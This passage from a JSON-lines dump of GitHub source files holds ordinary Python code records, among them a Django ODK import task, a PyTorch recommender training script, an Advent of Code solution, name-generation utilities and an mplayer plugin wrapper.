names...\"\n logger.info(msg)\n capture_message(msg, level=\"info\")\n surveys, names, loggers = utils.allocate_animal_names()\n msg = (\"[wastd.observations.tasks.update_names] {0} surveys reconstructed, \"\n \"{1} animal names reconstructed, {2} logger names set. \"\n \"Task successfully finished.\".format(\n len(surveys), len(names), len(loggers)))\n logger.info(msg)\n capture_message(msg, level=\"warning\")\n\n\n@background(queue=\"admin-tasks\", schedule=timezone.now())\ndef import_odka():\n \"\"\"Download and import new ODKA submissions.\"\"\"\n capture_message(\n \"[wastd.observations.tasks.import_odka] Starting ODKA import.\",\n level=\"warning\"\n )\n path = os.path.join(settings.MEDIA_ROOT, \"odka\")\n os.makedirs(path, exist_ok=True)\n\n utils.save_all_odka(path=path)\n capture_message(\n \"[wastd.observations.tasks.import_odka] ODKA submissions downloaded.\",\n level=\"info\"\n )\n\n utils.import_all_odka(path=path)\n capture_message(\n \"[wastd.observations.tasks.import_odka] ODKA submissions imported.\",\n level=\"info\"\n )\n\n utils.reconstruct_missing_surveys()\n capture_message(\n \"[wastd.observations.tasks.import_odka] \"\n \"ODKA surveys reconstructed, task successfully finished.\",\n level=\"warning\"\n )\n","repo_name":"dbca-wa/tsc","sub_path":"wastd/observations/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"10757326899","text":"from lib.Interface import *\nfrom lib.Arquivo import *\n\narq = 'cadastro.txt'\n\nif not arquivoExiste(arq):\n criarArquivo(arq)\n\nwhile True:\n resposta = menu(['Ver Pessoas Cadastradas', 'Cadastrar Nova pessoa', 'Sair do Sistema'])\n if resposta == 1:\n lerArquivo(arq)\n elif resposta == 2:\n cabeçalho('NOVO CADASTRO')\n nome = str(input('Nome: '))\n idade = int(input('Idade: '))\n cadastrar(arq, nome, idade)\n elif resposta == 3:\n cabeçalho('Programa encerrando... Até logo!')\n break\n else:\n print('\\n\\033[1;31mERRO: Digite uma opção válida\\033[m\\n')\n sleep(1)","repo_name":"RonaldBrennerSM/Cadastro-de-Pessoas","sub_path":"CadastroDePessoas/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21278621589","text":"############### Video solution explained https://www.youtube.com/watch?v=4GMHrjfH9eE&t=1s\r\nclass Solution(object):\r\n def hIndex(self, citations):\r\n \"\"\"\r\n :type citations: List[int]\r\n :rtype: int\r\n \"\"\"\r\n citations.sort() # [0,1,3,5,6] \r\n h = 0\r\n for k in range(len(citations)):\r\n k = len(citations) - k - 1\r\n if h < citations[k]:\r\n h = h + 1\r\n return h","repo_name":"TAUIL-Abd-Elilah/LeetCode","sub_path":"Medium/274. H-Index.py","file_name":"274. H-Index.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17750159266","text":"from easydict import EasyDict as edict\n\n__C = edict()\n# Consumers can get config by: from config import cfg\n\ncfg = __C\n\n# Size to resize incoming images to, both images and masks during training and validation\n__C.new_size = (150, 200)\n\n# batch size mainly for training, but also impacts dataloader for things like validation\n__C.batch_size = 16\n\n__C.lr = 0.001\n\n__C.epochs = 1","repo_name":"Haxxardoux/Lane-Finder","sub_path":"Lane finder/CNN/Pytorch/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"24767099585","text":"from keras.models import model_from_json\n\n# Save NN model yo json\n\n# serialize model named regressor to JSON\nmodel_json = regressor.to_json()\nwith open(\"model.json\", \"w\") as json_file:\n json_file.write(model_json)\n# serialize weights to HDF5\nregressor.save_weights(\"model.h5\")\nprint(\"Saved model ANN to disk\")\n\n# load json and create model\njson_file = open('model.json', 'r')\nloaded_model_json = json_file.read()\njson_file.close()\nloaded_model = model_from_json(loaded_model_json)\n# load weights into new model\nloaded_model.load_weights(\"model.h5\")\nprint(\"Loaded model from disk\")\n\n\n# evaluate loaded model on test data\nloaded_model.compile(loss='mse', optimizer='adam', metrics=['accuracy'])\nscore = loaded_model.evaluate(X_test, y_test, verbose=0)\nprint(\"%s: %.2f%%\" % (loaded_model.metrics_names[1], score[1]*100))","repo_name":"TetianaKlymchuk/NN-Model-Templates","sub_path":"PYTHON/save_load_json.py","file_name":"save_load_json.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12143435308","text":"# Use pytorch_py3.8.8\n# Create a single dataframe used for training\n\nimport os\nimport logging\nimport numpy as np\nimport glob \nimport pandas as pd\n\nlogging.basicConfig(\n # filename='out.log',\n level=logging.INFO,\n format='%(asctime)s %(levelname)s %(message)s')\nlogger = logging.getLogger(__name__) \n\n# All_Beauty All_Beauty_sentence\n# AMAZON_FASHION AMAZON_FASHION_sentence\n# CDs_and_Vinyl CDs_and_Vinyl_sentence\n# Cell_Phones_and_Accessories Cell_Phones_and_Accessories_sentence\n# Digital_Music Digital_Music_sentence\n# Electronics Electronics_sentence\n# Industrial_and_Scientific Industrial_and_Scientific_sentence\n# Luxury_Beauty Luxury_Beauty_sentence\n# Musical_Instruments Musical_Instruments_sentence\n# Software Software_sentence\n# Video_Games Video_Games_sentence\n\ndata_name = 'All_Beauty_sentence'\ntrain_size = 30000\n\n# Define source and destination paths\ndata_path = f'/home/tuomas/Python/Gradu/data_processing/datasets/Amazon review data/Preprocess_common2/{data_name}/'\nsave_dir = '20k'\nsave_path = f'/home/tuomas/Python/Gradu/data_processing/datasets/Amazon review data/Training_data/{data_name}/{save_dir}/'\ntry:\n os.makedirs(save_path)\nexcept FileExistsError:\n pass\n\nfilenames = glob.glob(data_path + '*.csv')\nfilenames.sort()\n\n#%%\nfctr = 3.5\nreviews_left = int(train_size*fctr)\n\ndf_train = []\nfor i,fn in enumerate(filenames):\n logger.info(f\"Processing {(i+1)}/{len(filenames)}\")\n df = pd.read_csv(fn)[:reviews_left]\n df_train.append(df)\n reviews_left -= df.shape[0]\n if reviews_left <= 0:\n break\n\ndf_train = pd.concat(df_train)\ndf_train.to_csv(save_path+\"train_raw.csv\", index=False)\n\n\n","repo_name":"TP1997/Text-Preprocessing","sub_path":"Sentiment/create_training_dataframe.py","file_name":"create_training_dataframe.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15609032245","text":"T = int(input())\n\nfor test_case in range(1, T + 1):\n N = int(input())\n lst = list(map(int, input().split()))\n\n tree = [0] * (N + 1)\n idx = 1\n for i in range(len(lst)):\n tree[idx] = lst[i]\n j = idx\n while j > 1: # 자식이 부모보다 작은 값이 있는지 조상들 탐색\n if tree[j] <= tree[j // 2]:\n tree[j], tree[j // 2] = tree[j // 2], tree[j]\n j //= 2\n\n idx += 1\n\n # 마지막 노드의 조상들의 저장된 합\n Sum = 0\n i = len(tree)-1\n while i > 0:\n i //= 2\n Sum += tree[i]\n\n print(f'#{test_case} {Sum}')\n","repo_name":"JooaeSon/Daily_CodingTest","sub_path":"SWEA/Tree/이진 힙.py","file_name":"이진 힙.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"42465230977","text":"# HIDE is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n# \n# HIDE is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with HIDE. If not, see .\n\n\n'''\nCreated on Sep 4, 2015\n\nauthor: jakeret\n'''\nfrom __future__ import print_function, division, absolute_import, unicode_literals\n\nfrom datetime import datetime, timedelta\nimport numpy as np\n\nfrom ivy.plugin.base_plugin import BasePlugin\nimport os\n\nHEADER = \"Time,AzAntenna,ElAntenna,AzSource,ElSource,AzSpeedAnt,ElSpeedAnt,AzSpeedSrc,ElSpeedSrc, RA, DEC\"\nSEC_PER_DAY = 86400\n\nclass Plugin(BasePlugin):\n \"\"\"\n Writes the time ordered data to the file system\n \"\"\"\n\n def __call__(self):\n output_path = self.ctx.params.output_path\n file_fmt = self.ctx.params.coordinate_file_fmt\n \n file_date_fmt =\"%04d%02d%02d\"\n \n DAY = timedelta(1)\n \n strategy_start = self.ctx.strategy_start + timedelta(seconds=self.ctx.strategy[0].time)\n strategy_start = datetime(strategy_start.year, strategy_start.month, strategy_start.day)\n strategy_end = self.ctx.strategy_start + timedelta(seconds=self.ctx.strategy[-1].time)\n date = strategy_start\n \n idx0 = 0\n strategy = np.array(self.ctx.strategy)\n while strategy_start <= date <= strategy_end:\n next_day = date + DAY\n idx = np.sum(strategy[:, 0] < (next_day - self.ctx.strategy_start).total_seconds())\n if idx==idx0:\n date = next_day\n continue\n \n coords = strategy[idx0:idx]\n time = (coords[:, 0] - coords[0, 0]) / 3600\n \n time_steps = np.arange(time[0], time[-1]+self.ctx.params.coord_step_size/3600, self.ctx.params.coord_step_size/3600)\n \n elAntenna = np.interp(time_steps, time, np.degrees(coords[:, 1]))\n azAntenna = np.interp(time_steps, time, np.degrees(coords[:, 2]))\n \n filler = np.zeros((8, len(time_steps)))\n \n data = np.vstack((time_steps, azAntenna, elAntenna, filler)).T\n \n coord_path = os.path.join(output_path,\n \"%04d\"%date.year,\n \"%02d\"%date.month,\n \"%02d\"%date.day)\n \n if not os.path.exists(coord_path):\n os.makedirs(coord_path)\n\n file_name = file_fmt%(file_date_fmt%(date.year, date.month, date.day))\n np.savetxt(os.path.join(coord_path,file_name), \n data, \n fmt=str(\"%10.3f\"), # numpy bug does not accept unicode \n delimiter=\",\", \n header=HEADER)\n \n idx0 = idx\n date = next_day\n \n def __str__(self):\n return \"Write coord files\"\n \n","repo_name":"cosmo-ethz/hide","sub_path":"hide/plugins/write_coords.py","file_name":"write_coords.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"3889275393","text":"# -*- coding: utf-8 -*-#\r\n# Name: wanghong_information\r\n# Description: \r\n# Author: Wang Junling\r\n# Date: 2019/11/28\r\n\r\nimport os\r\nimport json\r\nimport openpyxl\r\n# class Information(object):\r\n# def __init__(self):\r\n# self.name=''\r\n# self.name=''\r\n# self.name=''\r\n# self.name=''\r\n# self.name=''\r\n# self.name=''\r\n# self.name=''\r\n# self.name=''\r\n# self.name=''\r\nopenpyxl_data=[]\r\nfor root,folder_list,file_list in os.walk(r'D:\\python\\douyin\\analysis\\user'):\r\n # print(root,folder_list,file_list)\r\n for i in file_list:\r\n with open(os.path.join(root,i),'r',encoding='utf-16') as f:\r\n data=f.readline()\r\n # print(data)\r\n dd=json.loads(data)\r\n\r\n\r\n\r\n\r\n\r\n dd=dd.get('user')\r\n print('抖音ID',dd.get('uid'))\r\n print('抖音名',dd.get('nickname'))\r\n print('简介',dd.get('signature'))\r\n print('性别', dd.get('gender'))\r\n print('学校', dd.get('school_name'))\r\n\r\n print('出生日',dd.get('birthday'))\r\n print('地区',dd.get('country'))\r\n print('城市',dd.get('city'))\r\n\r\n print('点赞',dd.get('total_favorited'))\r\n print('抖音+头条+火山',dd.get('mplatform_followers_count'))\r\n print('抖音粉丝',dd.get('follower_count'))\r\n print('关注',dd.get('following_count'))\r\n print('发布',dd.get('aweme_count'))\r\n print('动态',dd.get('dongtai_count'))\r\n print('喜欢',dd.get('favoriting_count'))\r\n print('头像url',dd.get('avatar_thumb').get('url_list'))\r\n openpyxl_data.append((dd.get('uid'),\r\n dd.get('nickname'),dd.get('signature'),dd.get('gender'),\r\n dd.get('school_name'),dd.get('birthday'),dd.get('country'),dd.get('city'),\r\n dd.get('total_favorited'),dd.get('mplatform_followers_count'),\r\n dd.get('follower_count'),dd.get('following_count'),\r\n dd.get('aweme_count'),dd.get('dongtai_count'),dd.get('favoriting_count'),\r\n '暂时为空',dd.get('avatar_thumb').get('url_list')[0]))\r\n # print(dd)\r\n\r\n\r\n\r\noutput_file_name = 'basic_information.xlsx'\r\n\r\n\r\ndef save_excel(target_list, output_file_name):\r\n \"\"\"\r\n 将数据写入xlsx文件\r\n \"\"\"\r\n if not output_file_name.endswith('.xlsx'):\r\n output_file_name += '.xlsx'\r\n\r\n # 创建一个workbook对象,而且会在workbook中至少创建一个表worksheet\r\n wb = openpyxl.Workbook()\r\n # 获取当前活跃的worksheet,默认就是第一个worksheet\r\n ws = wb.active\r\n title_data = ('抖音ID', '抖音名', '简介', '性别', '学校', '出生日', '地区', '城市', '点赞', '抖音+头条+火山粉丝', '抖音粉丝', '关注', '发布','动态','喜欢','转发','头像url')\r\n target_list.insert(0, title_data)\r\n rows = len(target_list)\r\n lines = len(target_list[0])\r\n for i in range(rows):\r\n for j in range(lines):\r\n ws.cell(row=i + 1, column=j + 1).value = target_list[i][j]\r\n\r\n # 保存表格\r\n wb.save(filename=output_file_name)\r\n\r\n\r\nsave_excel(openpyxl_data, output_file_name)\r\n\r\n\r\n","repo_name":"Breathleas/tiktok","sub_path":"tiktok/douyin/analysis/wanghong_information.py","file_name":"wanghong_information.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44039685372","text":"import torch\nimport wandb\nimport pickle\nimport random\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport torch.nn as nn\nfrom get_FM_data import *\nfrom torch.autograd import Variable\nfrom sklearn.metrics import *\n\n\nclass Config:\n def __init__(self):\n df = pd.read_csv('/home/keyu/keyu/recommendation/data/amazon/encoded_pairs_train.csv')\n self.num_users = max(df['user_id']) + 1\n self.num_items = max(df['item_id']) + 1\n self.id_emb_size = args().id_emb_size\n\n\nclass FMModel(nn.Module):\n def __init__(self):\n super(FMModel, self).__init__()\n\n # get the configurations\n self.config = Config()\n\n # define the user embeddings and item embeddings\n self.user_embeddings = nn.Embedding(self.config.num_users, self.config.id_emb_size)\n self.item_embeddings = nn.Embedding(self.config.num_items, self.config.id_emb_size)\n\n # Initialize embeddings with random values\n nn.init.normal_(self.user_embeddings.weight, mean=0.0, std=0.1)\n nn.init.normal_(self.item_embeddings.weight, mean=0.0, std=0.1)\n\n def forward(self, user_ids, item_ids):\n\n # sample the user and item embeddings\n batch_user_embeddings = self.user_embeddings(user_ids)\n batch_item_embeddings = self.item_embeddings(item_ids)\n\n return batch_user_embeddings, batch_item_embeddings\n\n\nclass TrainFM:\n def __init__(self):\n # define the model\n self.model = FMModel().to(device)\n\n # define optimizer\n self.optimizer = torch.optim.Adam(\n self.model.parameters(),\n lr=args().learning_rate\n )\n\n # define loss function\n self.cos_emb = nn.CosineEmbeddingLoss(margin=0.5)\n self.cos_sim = nn.CosineSimilarity()\n self.loss_fn = nn.MSELoss()\n\n # get test_loader\n self.train_loader = get_loader('train', args().batchsz)\n self.test_loader = get_loader('test', args().batchsz)\n\n print(\n ' #########################################', '\\n',\n '######## Data Initialization Done #######', '\\n',\n '#########################################',\n )\n\n def get_batch(self):\n temp_user, temp_item = set(), set()\n k = args().batchsz\n selected_indices = []\n while k > 0:\n idx = random.randint(0, self.num_train)\n curr_user = self.train_user[idx]\n curr_item = self.train_item[idx]\n if curr_user not in temp_user and curr_item not in temp_item:\n selected_indices.append(idx)\n temp_user.add(curr_user)\n temp_item.add(curr_item)\n k -= 1\n selected_indices = torch.tensor(selected_indices)\n return selected_indices\n\n def evaluation(self):\n y_true = np.array([])\n y_pred = np.array([])\n\n with torch.no_grad():\n for _, batch in enumerate(self.test_loader):\n # random sample non repeating pairs\n user_id, item_id, label = batch\n\n # put to the device\n user_id = Variable(user_id).to(device)\n item_id = Variable(item_id).to(device)\n\n # get the predictions\n user_emb, item_emb = self.model(user_id, item_id)\n\n # compute similarity\n similarity = self.cos_sim(user_emb, item_emb)\n batch_pred = torch.where(similarity > 0, torch.tensor(1), torch.tensor(-1))\n\n # append the result\n y_pred = np.append(y_pred, batch_pred.data.cpu().numpy())\n y_true = np.append(y_true, label)\n\n auc_score = roc_auc_score(y_true, y_pred)\n\n # check the performance for non-fake samples\n real_y_true = y_true[y_true == 1]\n real_y_pred = y_pred[y_true == 1]\n real_acc = accuracy_score(real_y_true, real_y_pred)\n\n return auc_score, real_acc\n\n def train(self):\n \n batch_loss = 0\n for _, batch in enumerate(self.train_loader):\n # random sample non repeating pairs\n user_id, item_id, label = batch\n\n # put to the device\n user_id = Variable(user_id).to(device)\n item_id = Variable(item_id).to(device) \n label = Variable(label).to(device)\n \n # get the embeddings\n user_emb, item_emb = self.model(user_id, item_id)\n\n # compute the loss\n # loss = self.cos_emb(user_emb, item_emb, label)\n similarities = self.cos_sim(user_emb, item_emb)\n loss = self.loss_fn(similarities, label)\n batch_loss += loss.item()\n\n # update the embeddings\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n return batch_loss / len(self.train_loader) \n\n def save_embeddings(self):\n # save a cpu version embeddings\n user_emb = self.model.user_embeddings.weight.data.cpu()\n item_emb = self.model.item_embeddings.weight.data.cpu()\n \n # save user embeddings to pickle\n user_path = '/home/keyu/keyu/recommendation/data/amazon/FM_emb/FM_emb_user-{}.pkl'.format(\n args().id_emb_size\n )\n with open(user_path, 'wb') as file:\n pickle.dump(user_emb, file)\n\n # save item embeddings to pickle\n item_path = '/home/keyu/keyu/recommendation/data/amazon/FM_emb/FM_emb_item-{}.pkl'.format(\n args().id_emb_size\n )\n with open(item_path, 'wb') as file:\n pickle.dump(item_emb, file)\n\n def workflow(self):\n \n best_dev = 0\n for epoch in range(args().num_epochs):\n\n # train one epoch\n train_loss = self.train()\n\n # evaluate the AUC\n auc_score, real_acc = self.evaluation()\n\n print()\n print(\n '*Epoch: {:02d}/{:02d}'.format(epoch + 1, args().num_epochs), '\\n',\n 'Train Loss: {:.5f}'.format(train_loss), '\\n',\n 'AUC score: {:.5f}'.format(auc_score), '\\n',\n 'Real Accuracy: {:.5f}'.format(real_acc)\n )\n\n # save the embeddings with best performance\n if best_dev < real_acc:\n best_dev = real_acc\n self.save_embeddings()\n\n if args().wandb:\n wandb.log(\n {\n 'Train Loss': train_loss,\n 'AUC': auc_score,\n 'Real Accuracy': real_acc\n }\n )\n\n\n# Arguments\ndef args():\n main_arg_parser = argparse.ArgumentParser(description=\"parser\")\n subparsers = main_arg_parser.add_subparsers(title=\"subcommands\", dest=\"subcommand\")\n train_arg_parser = subparsers.add_parser(\"train\", help=\"parser for training arguments\")\n train_arg_parser.add_argument(\"--gpu\", type=int, default=0,\n help=\"assign gpu index\")\n train_arg_parser.add_argument(\"--learning_rate\", type=float, default=0.0005,\n help=\" backbone network, roberta/bert \")\n train_arg_parser.add_argument(\"--id_emb_size\", type=int, default=32,\n help=\" embedding size for ID embedding trainning \")\n train_arg_parser.add_argument(\"--batchsz\", type=int, default=256,\n help=\"batch size\")\n train_arg_parser.add_argument(\"--num_epochs\", type=int, default=36,\n help=\"batch size\")\n train_arg_parser.add_argument(\"--wandb\", type=int, default=0,\n help=\"batch size\")\n return train_arg_parser.parse_args()\n\n\nif __name__ == '__main__':\n\n device = torch.device('cuda:{}'.format(args().gpu) if torch.cuda.is_available() else 'cpu')\n\n if args().wandb:\n wandb.init(\n project='RecSys-Amazon', \n name='FM-{}'.format(\n args().id_emb_size\n )\n )\n\n print(\n ' #########################################', '\\n',\n '############ HyperParameters: ###########', '\\n',\n '#########################################',\n )\n\n for key in args().__dict__.keys():\n print(key + ':', args().__dict__[key])\n print()\n\n TrainFM().workflow()\n","repo_name":"cnewbie007/recsys","sub_path":"FM_train.py","file_name":"FM_train.py","file_ext":"py","file_size_in_byte":8318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70386649687","text":"# Advent of Code 2021\n#\n# From https://adventofcode.com/2021/day/11\n#\nimport numpy as np\n\ninputs = np.array([list(map(int, list(row.strip()))) for row in open(\"../inputs/Advent2021_11.txt\", \"r\")])\ngrid = np.zeros(np.array(inputs.shape) + 2, dtype=int)\ngrid.fill(-999999)\ngrid[1:inputs.shape[0] + 1, 1:inputs.shape[1] + 1] = inputs\n\nflashes = 0\n\nfor loop in range(1, 3000):\n not_flashed = np.ones(grid.shape, dtype=bool)\n grid = grid + 1\n while np.any(grid[not_flashed] > 9):\n for x in range(1, grid.shape[1] - 1):\n for y in range(1, grid.shape[0] - 1):\n if not_flashed[x, y] and grid[x, y] > 9:\n grid[x - 1: x + 2, y - 1: y + 2] += 1\n not_flashed[x, y] = False\n flashes += 1\n grid[grid > 9] = 0\n if loop == 100:\n print(f'Day 11, Part 1 {flashes}')\n if np.sum(not_flashed[1:inputs.shape[0] + 1, 1:inputs.shape[1] + 1]) == 0:\n print(f'Day 11, Part 2 {loop}')\n break\n","repo_name":"davidxbuck/adventofcode","sub_path":"2021/src/Advent2021_11.py","file_name":"Advent2021_11.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34106758236","text":"import pandas as pd\nimport numpy as np\nimport sqlite3\n\ndf = pd.read_excel('./Notes_Checklist_Sites.xlsx')\n\ndf['year'] = df.iloc[:,0].str.extract(\"(\\d{4})\",expand=False)\n\nparts = df.iloc[:,0].str.split('_')\n\ndf['company'] = parts.str[2]\ndf.loc[parts.str[3].str[:2]!='en','company'] += \" \" + parts.str[3]\ndf.drop(df.columns[0], axis=1, inplace=True)\n\n\ndf = df.melt(id_vars=['company','year'],var_name='section',value_name='pages')\n\ndf['start_end'] = np.where(df.loc[:,'section'].str.lower().str.startswith('beg_'),0,1)\ndf['section'] = df.loc[:,'section'].str.lower().str.replace('end_|beg_','')\n\ndf[['pages']] = df[['pages']].applymap(lambda x: [[int(i) for i in str(x).split('&')]] if type(x)==str else [[x]] if np.isnan(x) else [[int(x)]] ) #if np.isnan(x) else [int(x)]\n\ndf.sort_values(by=['company','year','section','start_end'],inplace=True)\n\ndf_grouped = (df.groupby(['company','year','section'])['pages']\n .apply(sum)\n .apply(lambda x: zip(*x))\n .apply(list))\n\n\n\ndf_list = df_grouped.map(lambda x: list(np.arange(i[0],i[1]+1) for i in x)).map(lambda x: [i for sublist in x for i in sublist])\n\ndf_pages = pd.DataFrame(df_list.values.tolist())\n\npd_concat = pd.concat([df_list.reset_index(),df_pages],axis=1)\n\npage_classes = pd_concat.drop(columns=['pages']).melt(['company','year','section'],value_name='page').drop(columns=['variable']).dropna()\n\npage_classes[['page']] = page_classes[['page']].astype(int)\n\n\n# Write into database\n\nconn = sqlite3.connect('paragraphs.db')\n\npage_classes.to_sql(\"page_classes\",conn,if_exists='replace',index=False)","repo_name":"peteshub/text_mining_playground","sub_path":"parse_section_classification.py","file_name":"parse_section_classification.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"16174400396","text":"\"\"\"\nContains shared utils for naming,\nmostly about creating random and pseudo random strings.\n\nAlso contains the dictionaries for creating the pseudo random strings\n(matching the ones used for the Java Transformer).\n\"\"\"\nimport random\nimport string\n\n\ndef get_random_string(length: int) -> str:\n \"\"\"\n Returns a random string starting with a lower-case letter.\n Later parts can contain numbers, lower- and uppercase letters.\n\n Note: Random Seed should be set somewhere in the program!\n :param length: How long the required string must be. length > 0 required.\n :return: a randomly created string\n :raises: ValueError for zero and negative length\n \"\"\"\n if length < 1:\n raise ValueError(\"Random Strings must have length 1 minimum.\")\n # choose from all lowercase letter\n letters = string.ascii_letters + string.digits\n first_letter = random.choice(string.ascii_lowercase)\n result_str = ''.join(random.choice(letters) for i in range(length - 1))\n return first_letter + result_str\n\n\ndef get_pseudo_random_string(\n with_keyword: bool = True, with_adjective: bool = True, with_animal: bool = True, with_job: bool = True) -> str:\n \"\"\"\n Returns a pseudo random string containing keywords, animal-names, adjectives and job-names.\n Results look for example like:\n\n >>> get_pseudo_random_string()\n >>> get_important_dolphin_lawyer\n\n The key words are separated by underscores (\"_\") and there cannot be leading underscore.\n There is one word in the dictionary for every letter, except for \"x\" (because that is a hard letter).\n\n :param with_keyword: whether or not to add a keyword like \"get\",\"store\",\"save\", etc.\n :param with_adjective: whether or not to add adjectives like \"intelligent\",\"sneaky\", etc.\n :param with_animal: whether or not to add a animal name, like \"beaver\",\"octopus\", etc.\n :param with_job: whether or not to add a job-name, like \"lawyer\", \"doctor\", \"programmer\", etc.\n :return: a pseudo random string based of randomly drawing keywords. Joined by underscore.\n :raises: ValueError if all options were turned off.\n \"\"\"\n # Helper Variable to keep track if we have a starting element and need \"_\" as glue\n has_already_elements: bool = False\n # Helper to store the final result\n result = \"\"\n\n if not (with_keyword or with_animal or with_job or with_adjective):\n raise ValueError(\"All Options for get_pseudo_random_string have been turned off!\")\n\n if with_keyword:\n result = result + random.choice(keywords)\n has_already_elements = has_already_elements or True\n\n if with_adjective:\n if has_already_elements:\n result = result + \"_\"\n result = result + random.choice(adjectives)\n has_already_elements = has_already_elements or True\n\n if with_animal:\n if has_already_elements:\n result = result + \"_\"\n result = result + random.choice(animals)\n has_already_elements = has_already_elements or True\n\n if with_job:\n if has_already_elements:\n result = result + \"_\"\n result = result + random.choice(jobs)\n\n return result\n\n\n#===================================================================================================================\n# String Arrays\n# Below this line are just dictionaries of names similar to docker's container names\n# Used for Pseudo Random String Generation, Which looks nicer than full random\n#===================================================================================================================\n\nadjectives = [\"aged\", \"biased\", \"complex\", \"destructive\", \"efficient\",\n \"frugal\", \"great\", \"honorable\", \"iterative\",\n \"joking\", \"kinky\", \"lazy\", \"mighty\",\n \"naughty\", \"obsolete\", \"perfect\", \"quick\",\n \"rural\", \"simple\", \"touching\", \"urban\", \"verbose\",\n \"wonderful\", \"xenophobe\", \"yummy\", \"zoomed\"]\n\nanimals = [\n \"alpaca\", \"beaver\", \"cockroach\", \"dragon\", \"eagle\",\n \"fish\", \"goofer\", \"hippo\", \"ibex\",\n \"jellyfish\", \"kraken\", \"lux\", \"minks\",\n \"narwhal\", \"okapi\", \"python\", \"quetzal\",\n \"raccoon\", \"starfish\", \"tapir\", \"unicorn\",\n \"vulture\", \"wale\", \"yak\", \"zebra\"]\n\nkeywords = [\"from\", \"is\", \"to\", \"get\", \"set\",\n \"equals\", \"swap\", \"generate\", \"compare\",\n \"delete\", \"write\", \"save\", \"load\", \"store\",\n \"print\", \"start\", \"stop\", \"test\", \"run\",\n \"stream\", \"catch\", \"throw\"]\n\njobs = [\"attorney\", \"builder\", \"curator\", \"dean\", \"engineer\",\n \"firefighter\", \"gourmet\", \"hitchhiker\", \"influencer\",\n \"judge\", \"killer\", \"landlord\", \"musician\",\n \"nurse\", \"operator\", \"professor\", \"quartermaster\",\n \"redactor\", \"sergeant\", \"teacher\", \"urologist\",\n \"veterinarian\", \"waiter\", \"youtuber\", \"zookeeper\"]\n","repo_name":"ciselab/Lampion","sub_path":"Transformers/Python/lampion/utils/naming.py","file_name":"naming.py","file_ext":"py","file_size_in_byte":4850,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"13797965534","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom mymplayer import MyPlayer\nimport shlex\n\n\nclass Plugin(object):\n def __init__(self, g2s, cmd):\n '''\n @param g2s instance glade2script\n @param cmd name@@drawing@@line options@@progress function@@output function\n '''\n self.g2s = g2s\n self.send = g2s.send\n l = cmd.split('@@')\n self.name = l.pop(0)\n drawing, option, self.p_cb, self.o_cb = l\n arg = []\n if drawing != 'None':\n wid = getattr(g2s.gui, drawing).window.xid\n arg = ['-wid', str(wid)]\n if option != \"None\":\n arg += shlex.split(option)\n #print arg\n self.player = MyPlayer(arg)\n self.player.connect('eof', self.player_eof_cb)\n self.player.connect('starting', self.starting_cb)\n self.player.connect('metadata', self.metadata_cb)\n self.player.connect('media-info', self.player_media_info_cb)\n if self.p_cb != \"None\":\n self.player.connect('position', self.player_position_cb)\n if self.o_cb != \"None\":\n self.player.connect('verbose', self.player_verbose_cb)\n self.player.start()\n pass \n \n def player_media_info_cb(self, th, arg):\n args = [ '%s=\"%s\"' % (k,v) for k,v in arg.iteritems()]\n self.send('%s mediainfo@%s' % (self.name, '@@'.join(args)) )\n \n def metadata_cb(self, th, arg):\n args = [ '%s=\"%s\"' % (k,v) for k,v in arg.iteritems()]\n self.send('%s metadata@%s' % (self.name, '@@'.join(args)) )\n \n def player_position_cb(self, th, arg):\n args = [ '%s=%s' % (k,v) for k,v in arg.iteritems()]\n self.send('%s position@%s' % (self.p_cb, '@@'.join(args)) )\n \n def player_verbose_cb(self, th, arg):\n self.send('%s verbose@%s' % (self.o_cb, arg) )\n \n def starting_cb(self, th, arg):\n self.send('%s starting@%s' % (self.name, th.metadata['uri']) )\n \n def player_eof_cb(self, th, code, arg):\n self.send('%s eof@%s@%s' % (self.name, code, arg) )\n \n def CMD(self, cmd):\n cmd_e = 'self.player.%s' % cmd\n arg = eval(cmd_e)\n #print cmd_e,arg\n if arg is not None:\n cmd = cmd.split('(')[0]\n try:\n prefixe, cmd = cmd.split('.')\n except:\n prefixe = cmd\n self.send('%s %s@%s %s' % (self.name, prefixe, cmd, arg))\n\n \n 